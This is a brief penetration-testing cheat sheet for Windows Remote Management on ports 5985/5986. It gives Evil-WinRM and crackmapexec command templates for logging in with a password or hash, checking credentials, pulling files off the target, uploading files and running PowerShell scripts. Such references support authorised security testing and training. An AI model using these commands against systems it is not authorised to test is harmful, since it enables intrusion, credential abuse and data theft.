TCP: Evil-WinRM - 5985 / 5986

Connection

evil-winrm -i <Target IP Address> [-P <Port>] -u [<Domain Name>\]<Username> -p <Password>
evil-winrm -i <Target IP Address> [-P <Port>] -u [<Domain Name>\]<Username> -H <Hash>

Enumeration

crackmapexec --verbose winrm [--port <Port>] <Target IP Address>
crackmapexec --verbose winrm [--port <Port>] <Target IP Address> -u <Username> -p <Password>

Data Extraction

Inside Evil-WinRM Console

download <Source File> <Destination File>

Outside Evil-WinRM Console

Upload File

evil-winrm -i <Target IP Address> -u <Username> -p <Password> -s "<Source File>" -d "<Destination Directory>"

Download File

evil-winrm -i <Target IP Address> -u <Username> -p <Password> -g "<Source File>" -d "<Destination Directory>"

Run PowerShell

evil-winrm -i <Target IP Address> -u <Username> -p <Password> -s "<Powershell Script>"
PreviousTCP: RPC - 135 / 593NextTCP: MYSQL - 3306

Last updated